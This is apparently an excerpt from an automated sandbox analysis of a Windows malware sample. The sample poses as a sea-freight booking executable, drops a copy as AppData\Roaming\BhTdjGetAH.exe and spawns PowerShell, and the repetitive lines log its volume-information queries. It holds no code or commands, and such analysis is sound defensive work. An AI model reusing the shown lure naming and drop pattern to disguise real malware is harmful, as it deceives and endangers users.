Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Queries volume information: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Queries volume information: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
